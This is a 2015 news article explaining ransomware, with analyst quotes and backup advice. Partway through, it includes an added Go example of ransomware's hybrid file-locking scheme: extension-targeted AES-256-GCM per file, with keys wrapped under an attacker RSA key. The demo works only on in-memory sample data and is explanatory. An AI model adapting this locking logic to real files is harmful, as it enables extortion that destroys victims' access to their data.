May 18, 2015 8:32 AM
There’s an old Internet scam floating around that’s getting some new attention lately.
It’s called “ransomware,” and if you’re unlucky, it may have already infected your computer or mobile phone.
Ransomware is a term for a specific type of malware that quietly encrypts certain files on your computer, putting them out of reach of everyone but the crook who holds the key.
Earlier this year, the FBI issued a warning, alerting the public to a recent rise in the spread of ransomware in the U.S.
Two of the most pervasive families, CryptoLocker and CryptoWall, are thought to have bilked millions of dollars from unsuspecting users, and have recently begun spreading through Japan, Australia, and several other nations.
The cybersecurity firm Websense says it alone has detected about 2 million instances of CryptoLocker, with more than 60 percent of those detections targeting computers in Australia.
And researchers at anti-virus firm Symantec say a newer ransomware family, laced with references to the TV series "Breaking Bad," is spreading rapidly around the world.
It works like this: the malware quietly searches the computer for certain types of files and, without the user’s knowledge, encrypts them. Once encrypted, those files cannot be opened without the decryption key, which only the attackers hold.
Users are then notified, usually via a pop-up message, that their files are now inaccessible and will remain so unless they pay a fee to the attackers in exchange for the decryption key that unlocks their documents.
It’s almost as if someone digitally stole all your data and promised to sell it back to you only after you paid a fee.
“Ransomware looks for specific types of files to encrypt, traditionally,” said John Shier, a senior security analyst at the cybersecurity firm Sophos. “It’s looking for what we call user-generated content – word documents, spreadsheets, pictures. These could be pictures of your child’s first birthday, videos of your honeymoon, financial spreadsheets of your small business; files that you really care about.”
The ransom, usually in the $300 to $600 range, is typically costly enough to hurt but not so expensive that users might simply give up and abandon their data.
“This is a business they’re running; in order for them to provide a product that is going to be successful, they can’t price themselves out of the market,” Shier said. “So that dollar figure has been pretty consistent. That price figure is just that – low enough that if you don’t have a way of getting out of this, it’s going to hurt a little bit, but not so much that you’re willing to give up your files.”
Once payment is made, often via Bitcoin or prepaid cards, the bad guys hand over the decryption key. But there’s no guarantee that will happen.
“I get that question a lot – will they turn over the decryption key?” Shier asked. “They absolutely do, because this is basically a business. They want it known that other people who have been hit by this can say ‘Well, I paid them and got my files back.’ If you pay, you get your files back – that’s just good business.”
Although relatively simple in design, ransomware typically encrypts files with standard 256-bit AES, which no realistic amount of computing power can brute-force; without the key, the files stay locked.
“There’s really nothing you can do” once your files have been locked, Shier said.
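What “encrypts them, with the key held by the bad guys” amounts to in practice, as an added example written for this page (it is not code from the article, from Sophos, or from any ransomware family): each targeted file is encrypted under its own random AES-256 key, and that key is in turn encrypted with an RSA public key shipped inside the malware, the hybrid design CryptoLocker is known to have used. The matching private key never leaves the attacker. The in-memory sample files, the extension list and the function names are assumptions for the demo; nothing here touches a real disk.

```go
package main

import (
	"crypto/aes"
	"crypto/cipher"
	"crypto/rand"
	"crypto/rsa"
	"crypto/sha256"
	"fmt"
	"path"
)

// Constructed in-memory "disk" (path -> contents) standing in for a victim's files.
var sampleDisk = map[string][]byte{
	"Documents/budget.xlsx":         []byte("Q1 revenue 12000; Q1 costs 9000"),
	"Pictures/first-birthday.jpg":   []byte("\xff\xd8\xff\xe0JFIF...cake photo bytes"),
	"notes.txt":                     []byte("call the bank on Monday"),
	"Windows/System32/kernel32.dll": []byte("MZ...system binary, not user content"),
}

// Extensions treated as user-generated content (assumption: short, lowercase, illustrative).
var targetExt = map[string]bool{".docx": true, ".xlsx": true, ".jpg": true, ".txt": true}

// Locked is all the victim keeps of a file: ciphertext, GCM nonce, RSA-wrapped AES-256 key.
type Locked struct{ WrappedKey, Nonce, Ciphertext []byte }

// newKeyPair makes an RSA-2048 pair; only the attacker's public half ships with the malware.
func newKeyPair() *rsa.PrivateKey {
	k, err := rsa.GenerateKey(rand.Reader, 2048)
	if err != nil {
		panic(err)
	}
	return k
}

// aead builds AES-256-GCM for one 32-byte file key.
func aead(fileKey []byte) (cipher.AEAD, error) {
	block, err := aes.NewCipher(fileKey)
	if err != nil {
		return nil, err
	}
	return cipher.NewGCM(block)
}

// lockFile encrypts under a fresh AES-256 key and wraps that key with RSA-OAEP.
func lockFile(pub *rsa.PublicKey, plaintext []byte) (Locked, error) {
	buf := make([]byte, 32+12) // 32-byte AES-256 key followed by a 96-bit GCM nonce
	if _, err := rand.Read(buf); err != nil {
		return Locked{}, err
	}
	fileKey, nonce := buf[:32], buf[32:]
	gcm, err := aead(fileKey)
	if err != nil {
		return Locked{}, err
	}
	wrapped, err := rsa.EncryptOAEP(sha256.New(), rand.Reader, pub, fileKey, nil)
	if err != nil {
		return Locked{}, err
	}
	return Locked{wrapped, nonce, gcm.Seal(nil, nonce, plaintext, nil)}, nil
}

// unlockFile is what the ransom buys; with any other private key the OAEP unwrap fails.
func unlockFile(priv *rsa.PrivateKey, l Locked) ([]byte, error) {
	fileKey, err := rsa.DecryptOAEP(sha256.New(), rand.Reader, priv, l.WrappedKey, nil)
	if err != nil {
		return nil, err
	}
	gcm, err := aead(fileKey)
	if err != nil {
		return nil, err
	}
	return gcm.Open(nil, l.Nonce, l.Ciphertext, nil)
}

// lockDisk is the sweep the article describes: user content is locked, system files are left alone.
func lockDisk(pub *rsa.PublicKey, disk map[string][]byte) (map[string]Locked, error) {
	locked := map[string]Locked{}
	for name, data := range disk {
		if targetExt[path.Ext(name)] {
			l, err := lockFile(pub, data)
			if err != nil {
				return nil, err
			}
			locked[name] = l
		}
	}
	return locked, nil
}

func main() {
	attacker := newKeyPair() // the private half never leaves the attacker
	locked, err := lockDisk(&attacker.PublicKey, sampleDisk)
	if err != nil {
		panic(err)
	}
	_, guessErr := unlockFile(newKeyPair(), locked["notes.txt"]) // any key but the right one
	fmt.Printf("locked %d of %d files; wrong key: %v\n", len(locked), len(sampleDisk), guessErr)
}
```

The wrong-key error is the whole story: the victim’s machine holds the malware, its public key, every ciphertext and every wrapped key, and none of that is enough, while brute-forcing a 256-bit file key is out of reach for any realistic computing power. The only recovery paths are the attacker’s private key or an implementation mistake by the malware authors (a key left on disk, a weak random-number generator), which a scheme built like this one does not make. That is also why the practical defence is an offline backup rather than decryption.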
Ransomware is indiscriminate in its targets, hitting personal, corporate and government computer systems alike.
“They don’t care who they grab – it’s spray and pray,” Shier said. “The corporate world is least likely to pay because they’re most likely to have mitigations in place, meaning the most success the bad guys are seeing is off the public.”
Even though it’s pretty much too late to do anything once a device has been infected and locked down, there are ways to protect against ransomware, or to limit the damage once infected. The first and best, said Shier, is to back up all your files regularly, and to keep copies in separate locations.
“The key is to store your backed-up files someplace inaccessible,” he said. “Taking the backup off the network is absolutely essential. And if you re-image [wipe and reinstall from a clean image] on a clean machine, you have to make sure you address how you got infected in the first place.”